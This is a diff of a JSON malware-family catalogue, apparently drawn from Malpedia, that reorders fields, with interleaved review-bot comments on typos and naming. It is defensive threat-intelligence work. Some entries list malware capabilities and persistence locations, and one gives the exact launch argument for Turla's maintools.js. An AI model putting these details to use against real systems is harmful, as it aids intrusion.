"https://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "51da734c-70dd-4337-ab08-ab61457e0da5", - "value": "Shishiga", - "description": "" + "value": "Shishiga" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.spamtorte", "http://cyber.verint.com/resource/spamtorte-v2-investigating-a-multi-layered-spam-botnet/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7b9a9ea0-04d2-42ef-b72f-9d6476b9e0d0", - "value": "Spamtorte", - "description": "" + "value": "Spamtorte" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sshdoor", 
"http://contagiodump.blogspot.com/2013/02/linux-sshdoor-sample.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "275d65b9-0894-4c9b-a255-83daddb2589c", - "value": "SSHDoor", - "description": "" + "value": "SSHDoor" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.stantinko", "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e8c131df-ee3b-41d4-992d-71d3090d2d98", - "value": "Stantinko", - "description": "" + "value": "Stantinko" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.torii", "https://blog.avast.com/new-torii-botnet-threat-research" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a874575e-0ad7-464d-abb6-8f4b7964aa92", - "value": "Torii", - "description": "" + "value": "Torii" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.trump_bot", "http://paper.seebug.org/345/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "feb6a5f6-32f9-447d-af9c-08e499457883", - "value": "Trump Bot", - "description": "" + "value": "Trump Bot" }, { + "description": "", "meta": { - "synonyms": [ - "Amnesia", - "Radiation" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami", "https://www.8ackprotect.com/blog/big_brother_is_attacking_you", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/", "http://get.cyberx-labs.com/radiation-report" - ] + ], + "synonyms": [ + "Amnesia", + "Radiation" + ], + "type": [] }, "uuid": "21540126-d0bb-42ce-9b93-341fedb94cac", - "value": "Tsunami", - "description": "" + "value": "Tsunami" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.turla_rat" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1b62a421-c0db-4425-bcb2-a4925d5d33e0", - "value": "Turla RAT", - "description": "" + "value": "Turla RAT" }, { + "description": "", "meta": { - "synonyms": [ - "Espeon" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.umbreon", "http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/", "http://contagiodump.blogspot.com/2018/03/rootkit-umbreon-umreon-x86-arm-samples.html" - ] + ], + "synonyms": [ + "Espeon" + ], + "type": [] }, "uuid": "637000f7-4363-44e0-b795-9cfb7a3dc460", - "value": "Umbreon", - "description": "" + "value": "Umbreon" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.vpnfilter", "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1", 
@@ -1440,46 +1442,42 @@
 "https://blog.talosintelligence.com/2018/05/VPNFilter.html",
 "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-VPN-Filter-analysis-v2.pdf?la=en",
 "https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "5ad30da2-2645-4893-acd9-3f8e0fbb5500",
- "value": "elf.vpnfilter",
- "description": ""
+ "value": "elf.vpnfilter"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmess"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "b0046a6e-3b8b-45ad-a357-dabc46aba7de",
- "value": "elf.wellmess",
- "description": ""
+ "value": "elf.wellmess"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wirenet",
 "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html",
 "https://news.drweb.com/show/?i=2679&lng=en&c=14"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "47a8fedb-fd60-493a-9b7d-082bdb85621e",
- "value": "Wirenet",
- "description": ""
+ "value": "Wirenet"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "splm",
- "chopstick",
- "fysbis"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xagent",
 "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
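Review bot: `"value": "elf.vpnfilter"` and `"value": "elf.wellmess"` carry Malpedia's internal family identifier as the display name, while every neighbouring entry in this hunk (Wirenet, X-Agent) and the rest of the file use the human-readable name and leave the Malpedia id to the refs URL. The sorted layout makes the mismatch easy to see, but the commit leaves it. Since entries appear to be keyed by `uuid`, renaming to `"value": "VPNFilter"` and `"value": "WellMess"` looks safe; if anything downstream matches on the name, keep the old strings in `"synonyms"` so lookups do not break.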
@@ -1487,105 +1485,102 @@ "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf", "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/" - ] + ], + "synonyms": [ + "splm", + "chopstick", + "fysbis" + ], + "type": [] }, "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", - "value": "X-Agent", - "description": "" + "value": "X-Agent" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xaynnalc", "https://twitter.com/michalmalik/status/846368624147353601" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "32b95dc7-03a6-45ab-a991-466208dd92d2", - "value": "Xaynnalc", - "description": "" + "value": "Xaynnalc" }, { + "description": "Linux DDoS C&C Malware", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos", "https://en.wikipedia.org/wiki/Xor_DDoS", "https://www.cdnetworks.com/resources/whitepapers/sg/Whitepaper23.pdf", "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7f9df618-4bd1-44a1-ad88-e5930373aac4", - "value": "XOR DDoS", - "description": "Linux DDoS C&C Malware" + "value": "XOR DDoS" }, { + "description": "", "meta": { - "synonyms": [ - "darlloz" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.zollard", "https://blogs.cisco.com/security/the-internet-of-everything-including-malware" - ] + ], + "synonyms": [ + "darlloz" + ], + "type": [] }, "uuid": "9218630d-0425-4b18-802c-447a9322990d", - "value": "Zollard", - "description": "" + "value": "Zollard" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ios.dualtoy", 
"http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8269e779-db23-4c94-aafb-36ee94879417", - "value": "DualToy", - "description": "" + "value": "DualToy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ios.guiinject", "https://sentinelone.com/blogs/analysis-ios-guiinject-adware-library/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d9215579-eee0-4e50-9157-dba7c3214769", - "value": "GuiInject", - "description": "" + "value": "GuiInject" }, { + "description": "The iOS malware that is installed over USB by osx.wirelurker", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ios.wirelurker", "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bc32df24-8e80-44bc-80b0-6a4d55661aa5", - "value": "WireLurker", - "description": "The iOS malware that is installed over USB by osx.wirelurker" + "value": "WireLurker" }, { + "description": "Part of Malware-as-service platform\r\nUsed as a generic name for Java-based RAT\r\nFunctionality\r\n- collect general system and user information \r\n- terminate process\r\n-log keystroke\r\n-take screenshot and access webcam\r\n- steal cache password from local or web forms\r\n- download and execute Malware\r\n- modify registry\r\n- download components\r\n- Denial of Service attacks\r\n- Acquire VPN certificates\r\n\r\nInitial infection vector\r\n1. Email to JAR files attached\r\n2. 
Malspam URL to downlaod the malware\r\n\r\nPersistence\r\n- Runkey - HKCU\\Software\\Microsoft\\Windows\\current version\\run\r\n\r\nHiding\r\nUses attrib.exe \r\n\r\nNotes on Adwind\r\nThe malware is not known to be proxy aware", "meta": { - "synonyms": [ - "AlienSpy", - "JSocket", - "Frutas", - "UNRECOM", - "JBifrost", - "Sockrat" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind", "https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html", 
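Review bot: The AdWind description carried to the new side (`+ "description": "Part of Malware-as-service platform…"`) records the persistence location as `HKCU\\Software\\Microsoft\\Windows\\current version\\run`, which is not the actual key name; an analyst copying this into a registry detection rule would match nothing, so it should read `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`. The same string has the typo `downlaod` and still embeds `\r\n` line breaks, unlike the single-line descriptions around it. The entry begins in this hunk and its `refs` list continues into the next hunk at 1594.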
@@ -1594,190 +1589,195 @@ "https://codemetrix.net/decrypting-adwind-jrat-jbifrost-trojan/", "https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885", "https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html" - ] + ], + "synonyms": [ + "AlienSpy", + "JSocket", + "Frutas", + "UNRECOM", + "JBifrost", + "Sockrat" + ], + "type": [] }, "uuid": "8eb9d4aa-257a-45eb-8c65-95c18500171c", - "value": "AdWind", - "description": "Part of Malware-as-service platform\r\nUsed as a generic name for Java-based RAT\r\nFunctionality\r\n- collect general system and user information \r\n- terminate process\r\n-log keystroke\r\n-take screenshot and access webcam\r\n- steal cache password from local or web forms\r\n- download and execute Malware\r\n- modify registry\r\n- download components\r\n- Denial of Service attacks\r\n- Acquire VPN certificates\r\n\r\nInitial infection vector\r\n1. Email to JAR files attached\r\n2. Malspam URL to downlaod the malware\r\n\r\nPersistence\r\n- Runkey - HKCU\\Software\\Microsoft\\Windows\\current version\\run\r\n\r\nHiding\r\nUses attrib.exe \r\n\r\nNotes on Adwind\r\nThe malware is not known to be proxy aware" + "value": "AdWind" }, { + "description": "", "meta": { - "synonyms": [ - "Trupto" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.crossrat", "https://objective-see.com/blog/blog_0x28.html", "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" - ] + ], + "synonyms": [ + "Trupto" + ], + "type": [] }, "uuid": "bae3a6c7-9e58-47f2-8749-a194675e1c84", - "value": "CrossRAT", - "description": "" + "value": "CrossRAT" }, { + "description": "jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. 
Note that the Adwind family often is mistakenly labeled as jRAT, because of of a red hering reference to jrat.io.", "meta": { - "synonyms": [ - "Jacksbot" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat", "https://github.com/java-rat", "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered", "https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/" - ] + ], + "synonyms": [ + "Jacksbot" + ], + "type": [] }, "uuid": "f2a9f583-b4dd-4669-8808-49c8bbacc376", - "value": "jRAT", - "description": "jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. Note that the Adwind family often is mistakenly labeled as jRAT, because of of a red hering reference to jrat.io." + "value": "jRAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jspy", "https://how-to-hack.net/hacking-guides/review-of-jspy-rat-jspy-net/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ff24997d-1f17-4f00-b9b8-b3392146540f", - "value": "jSpy", - "description": "" + "value": "jSpy" }, { + "description": "According to SpiderLabs, in May 2015 the \"company\" Quaverse offered a RAT known as Quaverse RAT or QRAT. At around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax.com. 
Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT).", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qarallax_rat", "https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applicants/", "http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spam/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e7852eb9-9de9-43d3-9f7e-3821f3b2bf41", - "value": "Qarallax RAT", - "description": "According to SpiderLabs, in May 2015 the \"company\" Quaverse offered a RAT known as Quaverse RAT or QRAT. At around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax.com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT)." + "value": "Qarallax RAT" }, { + "description": "QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, ...), and it comes as a SaaS. 
For additional historical context, please see jar.qarallax.", "meta": { - "synonyms": [ - "Quaverse RAT" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qrat", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT--Remote-Access-as-a-Service/", "https://www.digitrustgroup.com/java-rat-qrat/", "https://blogs.forcepoint.com/security-labs/look-qrypter-adwind%E2%80%99s-major-rival-cross-platform-maas-market" - ] + ], + "synonyms": [ + "Quaverse RAT" + ], + "type": [] }, "uuid": "ef385825-bfa1-4e8c-b368-522db78cf1bd", - "value": "QRat", - "description": "QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, ...), and it comes as a SaaS. For additional historical context, please see jar.qarallax." + "value": "QRat" }, { + "description": "Ratty is an open source Java RAT, made available on GitHub and promoted heavily on HackForums. At some point in 2016 / 2017 the original author deleted his repository, but several clones exist.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.ratty", "https://github.com/shotskeber/Ratty" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "da032a95-b02a-4af2-b563-69f686653af4", - "value": "Ratty", - "description": "Ratty is an open source Java RAT, made available on GitHub and promoted heavily on HackForums. At some point in 2016 / 2017 the original author deleted his repository, but several clones exist." 
+ "value": "Ratty" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak", "https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fd419da6-5c0d-461e-96ee-64397efac63b", - "value": "AIRBREAK", - "description": "" + "value": "AIRBREAK" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.bateleur", "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fb75a753-24ba-4b58-b7ed-2e39b0c68c65", - "value": "Bateleur", - "description": "" + "value": "Bateleur" }, { + "description": "WebAssembly-based crpyto miner.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.cryptonight", "https://gist.github.com/JohnLaTwC/112483eb9aed27dd2184966711c722ec", "https://twitter.com/JohnLaTwC/status/983011262731714565" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "faa19699-a884-4cd3-a307-36492c8ee77a", - "value": "CryptoNight", - "description": "WebAssembly-based crpyto miner." 
+ "value": "CryptoNight" }, { + "description": "", "meta": { - "synonyms": [ - "Roblox Trade Assist" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.cukiegrab_crx", "http://blog.trendmicro.com/trendlabs-security-intelligence/malicous-chrome-extensions-stealing-roblox-game-currency-sending-cookies-via-discord/" - ] + ], + "synonyms": [ + "Roblox Trade Assist" + ], + "type": [] }, "uuid": "d47ca107-3e03-4c25-88f9-8156426b7f60", - "value": "CukieGrab", - "description": "" + "value": "CukieGrab" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.kopiluwak", "https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-from-turla/", "https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2269d37b-87e9-460d-b878-b74a2f4c3537", - "value": "KopiLuwak", - "description": "" + "value": "KopiLuwak" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart", "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f53e404b-0dcd-4116-91dd-cad94fc41936", - "value": "magecart", - "description": "" + "value": "magecart" }, { + "description": "More_eggs is a JavaScript backdoor used by the Cobalt group. 
It attempts to connect to its C&C server and retrieve tasks to carry out, some of which are:\r\n- d&exec = download and execute PE file\r\n- gtfo = delete files/startup entries and terminate\r\n- more_eggs = download additional/new scripts\r\n- more_onion = run new script and terminate current script\r\n- more_power = run command shell commands", "meta": { - "synonyms": [ - "SpicyOmelette" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.more_eggs", "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/", 
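Review bot: Two descriptions moved to the new side in this hunk carry typos: the jRAT entry ends with `because of of a red hering reference to jrat.io`, which should read `because of a red herring reference to jrat.io`, and the CryptoNight entry reads `WebAssembly-based crpyto miner.` for `WebAssembly-based crypto miner.`. Since the reorder rewrites these lines anyway, fixing the text here avoids a second touch of the same entries. The More_eggs entry that begins at the end of this hunk continues into the hunk at 1787.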
@@ -1787,266 +1787,266 @@ "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", "https://asert.arbornetworks.com/double-the-infection-double-the-fun/", "https://blog.morphisec.com/cobalt-gang-2.0" - ] + ], + "synonyms": [ + "SpicyOmelette" + ], + "type": [] }, "uuid": "1c3009ff-b9a5-4ac1-859c-9b3b4a66a63f", - "value": "More_eggs", - "description": "More_eggs is a JavaScript backdoor used by the Cobalt group. It attempts to connect to its C&C server and retrieve tasks to carry out, some of which are:\r\n- d&exec = download and execute PE file\r\n- gtfo = delete files/startup entries and terminate\r\n- more_eggs = download additional/new scripts\r\n- more_onion = run new script and terminate current script\r\n- more_power = run command shell commands" + "value": "More_eggs" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.powmet", "http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9521ceb0-039d-412c-a38b-7bd9ddfc772e", - "value": "Powmet", - "description": "" + "value": "Powmet" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.scanbox", "https://www.alienvault.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks", "http://resources.infosecinstitute.com/scanbox-framework/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0a13a546-91a2-4de0-9bbb-71c9233ce6fa", - "value": "scanbox", - "description": "" + "value": "scanbox" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_ff_ext", "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": 
"c7ab9e5a-0ec9-481e-95ec-ad08f06cf985", - "value": "HTML5 Encoding", - "description": "" + "value": "HTML5 Encoding" }, { + "description": "Expects a parameter to run: needs to be started as 'maintools.js EzZETcSXyKAdF_e5I2i1'.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_maintools", "https://twitter.com/JohnLaTwC/status/915590893155098629" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "218f8ca8-1124-4e44-8fbd-4b05b46bde4b", - "value": "Maintools.js", - "description": "Expects a parameter to run: needs to be started as 'maintools.js EzZETcSXyKAdF_e5I2i1'." + "value": "Maintools.js" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_050", "https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef", "https://community.riskiq.com/projects/53b4bd1e-dad0-306b-7712-d2a608400c8f" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f2b0ffdc-7d4e-4786-8935-e7036faa174d", - "value": "Unidentified 050 (APT32 Profiler)", - "description": "" + "value": "Unidentified 050 (APT32 Profiler)" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.witchcoven", "https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "dcc0fad2-29a9-4b69-9d75-d288ca458bc7", - "value": "witchcoven", - "description": "" + "value": "witchcoven" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.bella", "https://blog.malwarebytes.com/threat-analysis/2017/05/another-osx-dok-dropper-found-installing-new-backdoor/", "https://github.com/kai5263499/Bella" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3c5036ad-2afc-4bc1-a5a3-b31797f46248", - "value": "Bella", - "description": "" + "value": "Bella" }, { + "description": "", 
"meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.careto", + "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" + ], "synonyms": [ "Mask", "Appetite" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.careto", - "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" - ] + "type": [] }, "uuid": "dcabea75-a433-4157-bb7a-be76de3026ac", - "value": "Careto", - "description": "" + "value": "Careto" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cointhief", "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "70e73da7-21d3-4bd6-9a0e-0c904e6457e8", - "value": "CoinThief", - "description": "" + "value": "CoinThief" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.coldroot_rat", "https://objective-see.com/blog/blog_0x2A.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "076a7ae0-f4b8-45c7-9de4-dc9cc7e54bcf", - "value": "Coldroot RAT", - "description": "" + "value": "Coldroot RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cpumeaner", "https://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "74360d1e-8f85-44d1-8ce7-e76afb652142", - "value": "CpuMeaner", - "description": "" + "value": "CpuMeaner" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.creative_updater", "https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/", "https://digitasecurity.com/blog/2018/02/05/creativeupdater/", 
"https://objective-see.com/blog/blog_0x29.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "40fc6f71-75ac-43ac-abd9-c90b0e847999", - "value": "CreativeUpdater", - "description": "" + "value": "CreativeUpdater" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.crisis", "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines", "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4b2ab902-811e-4b50-8510-43454d77d027", - "value": "Crisis", - "description": "" + "value": "Crisis" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.crossrider", "https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/?utm_source=twitter&utm_medium=social" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "05ddb459-5a2f-44d5-a135-ed3f1e772302", - "value": "Crossrider", - "description": "" + "value": "Crossrider" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dockster", "http://contagiodump.blogspot.com/2012/12/osxdockstera-and-win32trojanagentaxmo.html", "https://www.f-secure.com/weblog/archives/00002466.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "713d8ec4-4983-4fbb-827c-2ef5bc0e6930", - "value": "Dockster", - "description": "" + "value": "Dockster" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dummy", "https://objective-see.com/blog/blog_0x32.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "cbf9ff89-d35b-4954-8873-32f59f5e4d7d", - "value": "Dummy", - 
"description": "" + "value": "Dummy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilosx", "https://github.com/Marten4n6/EvilOSX", "https://twitter.com/JohnLaTwC/status/966139336436498432" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "24f3d8e1-3936-4664-b813-74c797b87d9d", - "value": "EvilOSX", - "description": "" + "value": "EvilOSX" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.flashback", "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed", "http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html", "http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f92b5355-f398-4f09-8bcc-e06df6fe51a0", - "value": "FlashBack", - "description": "" + "value": "FlashBack" }, { + "description": "", "meta": { - "synonyms": [ - "Quimitchin" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.fruitfly", "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/", 
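Review bot: The Crossrider reference kept on the new side, `https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/?utm_source=twitter&utm_medium=social`, carries marketing tracking parameters that are not part of the resource; trimming the query string to the bare article URL keeps the reference list canonical and avoids a duplicate entry if the same article is later added without them. The FruitFly entry that begins at the end of this hunk continues into the hunk at 2055.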
